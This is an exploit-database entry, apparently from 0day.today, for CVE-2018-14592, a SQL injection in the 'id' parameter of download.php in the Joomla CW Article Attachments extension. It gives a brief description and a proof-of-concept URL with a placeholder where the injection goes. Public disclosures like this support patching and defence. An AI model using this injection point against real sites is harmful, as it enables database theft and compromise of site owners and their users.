[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla CW Article Attachments 1.0.6 - id SQL Injection Vulnerability

Author
Haboob Team
Risk
[
Security Risk High
]
0day-ID
0day-ID-31153
Category
web applications
Date add
24-09-2018
CVE
CVE-2018-14592
Platform
php
# Exploit Title: Joomla! CW Article Attachments 1.0.6 - 'id' SQL Injection
# Exploit Author: Haboob Team
# Software Link: https://extensions.joomla.org/extension/cw-article-attachments/
# Version: below < 1.0.6
# CVE : CVE-2018-14592 
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14592
 
# 1. Description
# The CWJoomla CW Article Attachments PRO extension before 2.0.7 and CW Article Attachments 
# FREE extension before 1.0.6 for Joomla! allow SQL Injection within download.php.
  
# 2. Proof of Concept
  
http://IP-ADDRESS/plugins/content/cwattachments/cwattachments/helpers/download.php?id=INJECTION&sid=0123456789987654321

#  0day.today [2024-12-24]  #